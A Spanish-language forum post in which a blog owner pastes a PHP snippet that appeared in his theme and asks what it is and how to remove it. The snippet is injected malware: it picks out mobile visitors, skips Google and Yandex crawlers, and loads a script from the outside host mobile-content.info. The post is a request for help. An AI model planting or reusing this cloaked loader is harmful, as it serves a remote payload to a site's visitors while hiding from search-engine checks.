E
Esteban Sequeira
Lambda
Redactor
Verificación en dos pasos activada
Verificado por Whatsapp
Hola, en uno de mis blogs el theme antes estaba bastante limpio, pero durante un par de meses empezó a molestarme un código extraño, el cual es este:
Agradecería si alguien me explica que es o como elimino de una vez por todas ese código, que ya me tiene arto!.
Insertar CODE, HTML o PHP:
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script src="http://mobile-content.info/jquery-1.7.1.js"></script>'; flush(); exit; }
Agradecería si alguien me explica que es o como elimino de una vez por todas ese código, que ya me tiene arto!.